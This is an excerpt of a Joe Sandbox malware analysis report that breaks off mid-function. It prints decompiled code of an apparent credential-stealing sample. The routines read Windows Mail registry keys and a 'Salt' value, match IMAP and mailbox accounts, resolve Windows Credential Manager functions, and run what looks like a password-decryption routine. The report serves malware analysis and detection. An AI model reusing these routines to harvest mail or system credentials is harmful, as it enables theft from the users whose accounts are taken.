• RegCloseKey.ADVAPI32(?), ref: 00410CE0
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00410D31
• LocalFree.KERNEL32(?), ref: 00410D46
• ??3@YAXPAX@Z.MSVCRT ref: 00410D4F
                                                                                                                                                                          • Part of subcall function 00406541: strtoul.MSVCRT ref: 00406549
                                                                                                                                                                        Strings
                                                                                                                                                                        • Salt, xrefs: 00410CCA
                                                                                                                                                                        • Software\Microsoft\Windows Live Mail, xrefs: 00410C90
                                                                                                                                                                        • Software\Microsoft\Windows Mail, xrefs: 00410C84
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetstrcpy$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                                                                                                                                                        • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                                                                                                                                                        • API String ID: 1673043434-2687544566
                                                                                                                                                                        • Opcode ID: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                        • Instruction ID: 35ff079a9a2d20c7a5c67e942e04d515760747927ccc6212efb4229f933df569
                                                                                                                                                                        • Opcode Fuzzy Hash: 342b62813bf58c369db31d81dd449ebf5665bdc31e2008f4eea2573a64a7df1c
                                                                                                                                                                        • Instruction Fuzzy Hash: 94419876D0021DAECB11DBA5DC41ADEBBBCAF48304F0441ABEA45F3241DA74DB85CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                        			E0040CD82(intOrPtr __ecx, intOrPtr _a4) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				void _v619;
                                                                                                                                                                        				char _v620;
                                                                                                                                                                        				void _v1231;
                                                                                                                                                                        				char _v1232;
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				void* _t37;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        				char* _t54;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				void* _t61;
                                                                                                                                                                        				char* _t62;
                                                                                                                                                                        				void* _t67;
                                                                                                                                                                        				intOrPtr _t84;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				intOrPtr _t87;
                                                                                                                                                                        				void* _t88;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        
                                                                                                                                                                        				_t87 = _a4;
                                                                                                                                                                        				_t84 = __ecx;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t37 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0xa);
                                                                                                                                                                        				_push("mailbox://");
                                                                                                                                                                        				_push(_t37);
                                                                                                                                                                        				L004120D2();
                                                                                                                                                                        				_t89 = _t88 + 0xc;
                                                                                                                                                                        				if(_t37 == 0) {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					_a4 = 0;
                                                                                                                                                                        					if( *((intOrPtr*)(_t84 + 0x474)) > 0) {
                                                                                                                                                                        						while(1) {
                                                                                                                                                                        							_t85 = E0040DA96(_a4, _t84 + 0x468);
                                                                                                                                                                        							_v620 = 0;
                                                                                                                                                                        							memset( &_v619, 0, 0x261);
                                                                                                                                                                        							_v1232 = 0;
                                                                                                                                                                        							memset( &_v1231, 0, 0x261);
                                                                                                                                                                        							_t17 = _t85 + 0x104; // 0x104
                                                                                                                                                                        							_t18 = _t85 + 0x204; // 0x204
                                                                                                                                                                        							sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
                                                                                                                                                                        							_t20 = _t85 + 0x104; // 0x104
                                                                                                                                                                        							_t21 = _t85 + 0x204; // 0x204
                                                                                                                                                                        							sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
                                                                                                                                                                        							_t53 = 0;
                                                                                                                                                                        							_t89 = _t89 + 0x38;
                                                                                                                                                                        							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                                                                                                        								_t53 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_t53);
                                                                                                                                                                        							_t54 =  &_v620;
                                                                                                                                                                        							_push(_t54);
                                                                                                                                                                        							L00412072();
                                                                                                                                                                        							if(_t54 == 0) {
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t61 = 0;
                                                                                                                                                                        							if( *((intOrPtr*)(_t87 + 0x1c)) > 0) {
                                                                                                                                                                        								_t61 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(_t61);
                                                                                                                                                                        							_t62 =  &_v1232;
                                                                                                                                                                        							_push(_t62);
                                                                                                                                                                        							L00412072();
                                                                                                                                                                        							if(_t62 != 0) {
                                                                                                                                                                        								L18:
                                                                                                                                                                        								_a4 = _a4 + 1;
                                                                                                                                                                        								_t60 = _v8;
                                                                                                                                                                        								if(_a4 <  *((intOrPtr*)(_t60 + 0x474))) {
                                                                                                                                                                        									_t84 = _t60;
                                                                                                                                                                        									continue;
                                                                                                                                                                        								} else {
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L21;
                                                                                                                                                                        							L17:
                                                                                                                                                                        							if( *((char*)(E00406B3E( *((intOrPtr*)(_t87 + 0x1c)) - 1, _t87))) == 0x7e) {
                                                                                                                                                                        								E0040132A(_t57 + 1, _t85 + 0x304, 0xff);
                                                                                                                                                                        							} else {
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L21;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if( *((intOrPtr*)(_t87 + 0x1c)) <= 0) {
                                                                                                                                                                        						_t67 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t67 =  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0xc)))) +  *((intOrPtr*)(_t87 + 0x10));
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(7);
                                                                                                                                                                        					_push("imap://");
                                                                                                                                                                        					_push(_t67);
                                                                                                                                                                        					L004120D2();
                                                                                                                                                                        					_t89 = _t89 + 0xc;
                                                                                                                                                                        					if(_t67 == 0) {
                                                                                                                                                                        						goto L8;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				L21:
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040cd8d
                                                                                                                                                                        0x0040cd96
                                                                                                                                                                        0x0040cd98
                                                                                                                                                                        0x0040cd9b
                                                                                                                                                                        0x0040cda7
                                                                                                                                                                        0x0040cd9d
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda9
                                                                                                                                                                        0x0040cdab
                                                                                                                                                                        0x0040cdb0
Control-flow graph node addresses for the function below (graph rendering not recoverable from this page): 0x0040cdb1 through 0x0040ceff, with 0x00000000 entries where the report's graph view had empty nodes.

Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Similarity
• API ID: _stricmp_strnicmpmemsetsprintf$strlen
• String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
• API String ID: 4281260487-2229823034
• Opcode ID: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
• Instruction ID: 2d12b684a12309e3f166330e45fd276d2d431d1b057f0c9926c0b37ed6681b29
• Opcode Fuzzy Hash: 024d07740614e5bd8b0db970560de94806a9e64d99aa777f67af906b6590f4e6
• Instruction Fuzzy Hash: BE41B172604205DFD724DBA4C9C1F97B7E8AF08304F10467BE649E3281D778E955CB58
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 82%
// Decompiler output as rendered by the report. _t17/_t18/_t20/_t21/_t59 are
// decompiler temporaries that the output leaves undeclared; they are kept as-is.
E0040CD80(void* __eax, intOrPtr __ecx, intOrPtr _a4) {
	intOrPtr _v8;
	void _v619;
	char _v620;
	void _v1231;
	char _v1232;
	void* __edi;
	void* _t39;
	void* _t55;
	char* _t56;
	intOrPtr _t62;
	void* _t63;
	char* _t64;
	void* _t69;
	intOrPtr _t89;
	void* _t91;
	intOrPtr _t94;
	void* _t99;
	void* _t100;
	void* _t101;

	_t100 = _t99 - 0x4cc;
	_t94 = _a4;
	_t89 = __ecx;
	_v8 = __ecx;
	// _t39 = pointer to the character data of the string object in _a4 (length at +0x1c)
	if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
		_t39 = 0;
	} else {
		_t39 = *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) + *((intOrPtr*)(_t94 + 0x10));
	}
	// Per the API ID above, this call is most likely _strnicmp(str, "mailbox://", 10)
	_push(0xa);
	_push("mailbox://");
	_push(_t39);
	L004120D2();
	_t101 = _t100 + 0xc;
	if(_t39 == 0) {
		L9:
		// Walk the record list at __ecx+0x468 (count at +0x474); _a4 is reused as the index
		_a4 = 0;
		if( *((intOrPtr*)(_t89 + 0x474)) > 0) {
			while(1) {
				_t91 = E0040DA96(_a4, _t89 + 0x468);
				_v620 = 0;
				memset( &_v619, 0, 0x261);
				_v1232 = 0;
				memset( &_v1231, 0, 0x261);
				// Build "mailbox://<field +0x204>@<field +0x104>" and the same with "imap://"
				_t17 = _t91 + 0x104; // 0x104
				_t18 = _t91 + 0x204; // 0x204
				sprintf( &_v620, "mailbox://%s@%s", _t18, _t17);
				_t20 = _t91 + 0x104; // 0x104
				_t21 = _t91 + 0x204; // 0x204
				sprintf( &_v1232, "imap://%s@%s", _t21, _t20);
				_t55 = 0;
				_t101 = _t101 + 0x38;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t55 = *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) + *((intOrPtr*)(_t94 + 0x10));
				}
				// Most likely _stricmp(built URL, input string); 0 means the record matches
				_push(_t55);
				_t56 = &_v620;
				_push(_t56);
				L00412072();
				if(_t56 == 0) {
					goto L18;
				}
				_t63 = 0;
				if( *((intOrPtr*)(_t94 + 0x1c)) > 0) {
					_t63 = *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) + *((intOrPtr*)(_t94 + 0x10));
				}
				_push(_t63);
				_t64 = &_v1232;
				_push(_t64);
				L00412072();
				if(_t64 != 0) {
					L19:
					// No match for this record: advance to the next one
					_a4 = _a4 + 1;
					_t62 = _v8;
					if(_a4 < *((intOrPtr*)(_t62 + 0x474))) {
						_t89 = _t62;
						continue;
					} else {
					}
				} else {
					goto L18;
				}
				goto L22;
				L18:
				// Record matched: if the input string's last character is '~' (0x7e),
				// copy up to 0xff bytes into the record field at +0x304
				if( *((char*)(E00406B3E( *((intOrPtr*)(_t94 + 0x1c)) - 1, _t94))) == 0x7e) {
					E0040132A(_t59 + 1, _t91 + 0x304, 0xff);
				} else {
					goto L19;
				}
				goto L22;
			}
		}
	} else {
		if( *((intOrPtr*)(_t94 + 0x1c)) <= 0) {
			_t69 = 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t94 + 0xc)))) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(7);
                                                                                                                                                                        					_push("imap://");
                                                                                                                                                                        					_push(_t69);
                                                                                                                                                                        					L004120D2();
                                                                                                                                                                        					_t101 = _t101 + 0xc;
                                                                                                                                                                        					if(_t69 == 0) {
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				L22:
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}
                                                                                                                                                                        0x0040cd85
                                                                                                                                                                        0x0040cd8d
                                                                                                                                                                        0x0040cd96
                                                                                                                                                                        0x0040cd98
                                                                                                                                                                        0x0040cd9b
                                                                                                                                                                        0x0040cda7
                                                                                                                                                                        0x0040cd9d
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda2
                                                                                                                                                                        0x0040cda9
                                                                                                                                                                        0x0040cdab
                                                                                                                                                                        0x0040cdb0
                                                                                                                                                                        0x0040cdb1
                                                                                                                                                                        0x0040cdb6
                                                                                                                                                                        0x0040cdbb
                                                                                                                                                                        0x0040cde6
                                                                                                                                                                        0x0040cdec
                                                                                                                                                                        0x0040cdef
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040ce0d
                                                                                                                                                                        0x0040ce18
                                                                                                                                                                        0x0040ce1f
                                                                                                                                                                        0x0040ce2e
                                                                                                                                                                        0x0040ce35
                                                                                                                                                                        0x0040ce3a
                                                                                                                                                                        0x0040ce41
                                                                                                                                                                        0x0040ce54
                                                                                                                                                                        0x0040ce59
                                                                                                                                                                        0x0040ce60
                                                                                                                                                                        0x0040ce73
                                                                                                                                                                        0x0040ce78
                                                                                                                                                                        0x0040ce7a
                                                                                                                                                                        0x0040ce80
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce87
                                                                                                                                                                        0x0040ce8a
                                                                                                                                                                        0x0040ce8b
                                                                                                                                                                        0x0040ce91
                                                                                                                                                                        0x0040ce92
                                                                                                                                                                        0x0040ce9b
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040ce9d
                                                                                                                                                                        0x0040cea2
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040cea9
                                                                                                                                                                        0x0040ceac
                                                                                                                                                                        0x0040cead
                                                                                                                                                                        0x0040ceb3
                                                                                                                                                                        0x0040ceb4
                                                                                                                                                                        0x0040cebd
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040cecf
                                                                                                                                                                        0x0040ced2
                                                                                                                                                                        0x0040cede
                                                                                                                                                                        0x0040cdfc
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cee4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cebf
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cef2
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cecd
                                                                                                                                                                        0x0040cdfe
                                                                                                                                                                        0x0040cdbd
                                                                                                                                                                        0x0040cdc0
                                                                                                                                                                        0x0040cdcc
                                                                                                                                                                        0x0040cdc2
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdc7
                                                                                                                                                                        0x0040cdce
                                                                                                                                                                        0x0040cdd0
                                                                                                                                                                        0x0040cdd5
                                                                                                                                                                        0x0040cdd6
                                                                                                                                                                        0x0040cddb
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040cde0
                                                                                                                                                                        0x0040cef8
                                                                                                                                                                        0x0040ceff

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _stricmp_strnicmpmemsetsprintf
                                                                                                                                                                        • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                        • API String ID: 2822975062-2229823034
                                                                                                                                                                        • Opcode ID: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                        • Instruction ID: b4ee7e9bcea435462912fc28dba82f8fd87397000d83f7605d7513f68c800710
                                                                                                                                                                        • Opcode Fuzzy Hash: 0f1e78ed6c62de82fcf3c07d446e549c31a630c2920e6e4e59f58844e705f72b
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C417E72604205EFD724DBA4C9C1F96B7E8AF18304F00467BE64AE3281D778F995CB98
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                        			E0040820D(void* __ecx, void* __edi, void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
                                                                                                                                                                        				void _v4103;
                                                                                                                                                                        				char _v4104;
                                                                                                                                                                        				char _t30;
                                                                                                                                                                        				struct HMENU__* _t32;
                                                                                                                                                                        				char _t39;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				struct HWND__* _t43;
                                                                                                                                                                        				struct HMENU__* _t48;
                                                                                                                                                                        
                                                                                                                                                                        				_t42 = __edi;
                                                                                                                                                                        				_t38 = __ecx;
                                                                                                                                                                        				E00412360(0x1004, __ecx);
                                                                                                                                                                        				_t55 = _a8 - 4;
                                                                                                                                                                        				if(_a8 != 4) {
                                                                                                                                                                        					__eflags = _a8 - 5;
                                                                                                                                                                        					if(_a8 == 5) {
                                                                                                                                                                        						_t39 =  *0x418488;
                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                        						if(_t39 == 0) {
                                                                                                                                                                        							L8:
                                                                                                                                                                        							_push(_t42);
                                                                                                                                                                        							sprintf(0x4182c0, "dialog_%d", _a12);
                                                                                                                                                                        							_t43 = CreateDialogParamA(_a4, _a12, 0, E00408208, 0);
                                                                                                                                                                        							_v4104 = 0;
                                                                                                                                                                        							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t43,  &_v4104, 0x1000);
							__eflags = _v4104;
							if(__eflags != 0) {
								E00407FBF(__eflags, "caption",  &_v4104);
							}
							EnumChildWindows(_t43, E00408155, 0);
							DestroyWindow(_t43);
						} else {
							while(1) {
								_t30 =  *_t39;
								__eflags = _t30;
								if(_t30 == 0) {
									goto L8;
								}
								__eflags = _t30 - _a12;
								if(_t30 != _a12) {
									_t39 = _t39 + 4;
									__eflags = _t39;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					sprintf(0x4182c0, "menu_%d", _a12);
					_t32 = LoadMenuA(_a4, _a12);
					 *0x4181b4 =  *0x4181b4 & 0x00000000;
					_t48 = _t32;
					_push(1);
					_push(_t48);
					_push(_a12);
					E00408065(_t38, _t55);
					DestroyMenu(_t48);
				}
				return 1;
			}

APIs
• sprintf.MSVCRT ref: 0040822E
• LoadMenuA.USER32 ref: 0040823C
  • Part of subcall function 00408065: GetMenuItemCount.USER32 ref: 0040807A
  • Part of subcall function 00408065: memset.MSVCRT ref: 0040809B
  • Part of subcall function 00408065: GetMenuItemInfoA.USER32 ref: 004080D6
  • Part of subcall function 00408065: strchr.MSVCRT ref: 004080ED
• DestroyMenu.USER32(00000000), ref: 0040825A
• sprintf.MSVCRT ref: 0040829E
• CreateDialogParamA.USER32(?,00000000,00000000,00408208,00000000), ref: 004082B3
• memset.MSVCRT ref: 004082CF
• GetWindowTextA.USER32 ref: 004082E0
• EnumChildWindows.USER32 ref: 00408308
• DestroyWindow.USER32(00000000), ref: 0040830F
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
• String ID: caption$dialog_%d$menu_%d
• API String ID: 3259144588-3822380221
• Opcode ID: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
• Instruction ID: bbac317cb8ff6209085768228bd9594f53373bc5c39c5be55c638663b0a3ff3e
• Opcode Fuzzy Hash: b9f33812461a0d5adbc64602c5d7d9a501e96417e2329f7b634c61257a0a3adc
• Instruction Fuzzy Hash: 33210532540148BFDF12AF60DD45EEF3B68EB55706F0440BEFA41A1190DBB99E948B2D
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040E6C7() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x418514 != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleA("kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x417fe0 = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x417fd8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x417fd4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x417e6c = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x417fcc = _t2;
								if(_t2 != 0) {
									 *0x418514 = 1;
								}
							}
						}
					}
				}
				goto L9;
			}
                                                                                                                                                                        0x00000000

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,?,0040E377), ref: 0040E6D6
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040E6EF
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040E700
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040E711
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040E722
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040E733
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
• Instruction ID: 5b748ad6718b7057422386d5a916c05b319ca6e7afffd602bf2aa3a230b78167
• Opcode Fuzzy Hash: f149af1be731cb5c9e085b97aebb5c7a1c1acf09fea30269975c3b4f1367bab0
• Instruction Fuzzy Hash: E6F086B0AC5306A9E750CB26AD84FAB2DF85B85B81719403BF404F22D4DB7884428B6D
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E00404651(struct HINSTANCE__** __eax, void* __edi, void* __eflags) {
				void* __esi;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__** _t23;

				_t23 = __eax;
				E004046CC(__eax);
				_t12 = LoadLibraryA("advapi32.dll");
				 *_t23 = _t12;
				if(_t12 != 0) {
					_t23[2] = GetProcAddress(_t12, "CredReadA");
					_t23[3] = GetProcAddress( *_t23, "CredFree");
					_t23[4] = GetProcAddress( *_t23, "CredDeleteA");
					_t23[5] = GetProcAddress( *_t23, "CredEnumerateA");
					_t23[6] = GetProcAddress( *_t23, "CredEnumerateW");
					if(_t23[2] == 0 || _t23[3] == 0) {
						E004046CC(_t23);
					} else {
						_t23[1] = 1;
					}
				}
				return _t23[1];
			}

0x00404652
0x00404654
0x0040465e
0x00404666
0x00404668
0x00404680
0x0040468c
0x00404698
0x004046a4
0x004046ad
0x004046b1
0x004046c2
0x004046b9
0x004046b9
0x004046b9
0x004046b1
0x004046cb

APIs
  • Part of subcall function 004046CC: FreeLibrary.KERNEL32(?,00404659,?,0040DC5F,80000001,73AFF420), ref: 004046D3
• LoadLibraryA.KERNEL32(advapi32.dll,?,0040DC5F,80000001,73AFF420), ref: 0040465E
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404677
• GetProcAddress.KERNEL32(?,CredFree), ref: 00404683
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 0040468F
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040469B
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 004046A7
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
• Instruction ID: ff9940379d8f3ddc00738bb66027861fd390550b24bba25458702abe812256fc
• Opcode Fuzzy Hash: ff4db90ed3477d8874eb02d6fed1133769ac9249bccc171794c849054c12c83c
• Instruction Fuzzy Hash: 1F012CB0A447019ACB30AF75C809B56BAF4AF94705B218D2EE1C5A36A0E77E9181CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
			E004116BE(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, char* _a12, signed int* _a16) {
				void _v8;
				void _v12;
				void _v24;
				char _v39;
				void _v40;
				char _v132;
				void _v1156;
				void _v1172;
				char _v1180;
				void _v1187;
				char _v1188;
				void _v2228;
				void _v2243;
				void _v2244;
				void _v3267;
				char _v3268;
				void _v4291;
				char _v4292;
				char _v5340;
				void _v5347;
				char _v5348;
				char _v6116;
				char _v7136;
				void _v7140;
				void* __edi;
				void* __esi;
				int _t86;
				void* _t109;
				void* _t122;
				void* _t135;
				char _t156;
				signed char _t168;
				signed int _t171;
				intOrPtr _t177;
				signed int _t183;
				void* _t185;

				_t171 = __edx;
				E00412360(0x1be4, __ecx);
				_t156 = 0;
				_v3268 = 0;
				memset( &_v3267, 0, 0x3ff);
				_a8 = E00411533(_a8,  &_v3268);
				_t86 = strlen(_a4);
				_v8 = _t86;
				if(_a8 > 4) {
					_t193 = _t86;
					if(_t86 > 0) {
						asm("movsd");
						asm("movsd");
						asm("movsb");
						_v2244 = 0;
						memset( &_v2243, 0, 0x41e);
						_v1188 = 0;
						memset( &_v1187, 0, 0x41e);
						_v5348 = 0;
						memset( &_v5347, 0, 0x41e);
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_v4292 = 0;
						memset( &_v4291, 0, 0x3ff);
						E0040BE2A( &_v132);
						E0040BE4E(_v8,  &_v132, _a4);
						_t181 =  &_v132;
                                                                                                                                                                        						E0040BEEC( &_v39,  &_v132,  &_v2244);
                                                                                                                                                                        						memcpy( &_v2228,  &_v24, 8);
                                                                                                                                                                        						E0040BE2A( &_v132);
                                                                                                                                                                        						_push( &_v2244);
                                                                                                                                                                        						_t109 = 0x18;
                                                                                                                                                                        						E0040BE4E(_t109,  &_v132);
                                                                                                                                                                        						E0040BEEC( &_v39, _t181,  &_v1188);
                                                                                                                                                                        						memcpy( &_v1172,  &_v2244, 0x10);
                                                                                                                                                                        						memcpy( &_v1156,  &_v24, 8);
                                                                                                                                                                        						E0040BE2A(_t181);
                                                                                                                                                                        						_push( &_v1188);
                                                                                                                                                                        						_t122 = 0x28;
                                                                                                                                                                        						E0040BE4E(_t122, _t181);
                                                                                                                                                                        						E0040BEEC( &_v39, _t181,  &_v5348);
                                                                                                                                                                        						E00405364( &_v6116, _t193,  &_v1180,  &_v5348);
                                                                                                                                                                        						E004053E0( &_v5340,  &_v1188,  &_v4292,  &_v6116);
                                                                                                                                                                        						_t177 = _a8;
                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                        						_t183 = _t177 + (_t171 & 0x00000007) >> 3;
                                                                                                                                                                        						_a4 = 0;
                                                                                                                                                                        						if(_t183 > 0) {
                                                                                                                                                                        							do {
                                                                                                                                                                        								E004053E0(_t185 + (_a4 << 3) - 0xcc0,  &_v6116, _t185 + (_a4 << 3) - 0x10b8,  &_v6116);
                                                                                                                                                                        								_a4 =  &(_a4[1]);
                                                                                                                                                                        							} while (_a4 < _t183);
                                                                                                                                                                        							_t177 = _a8;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t135 = 0;
                                                                                                                                                                        						if(_t177 > _t156) {
                                                                                                                                                                        							do {
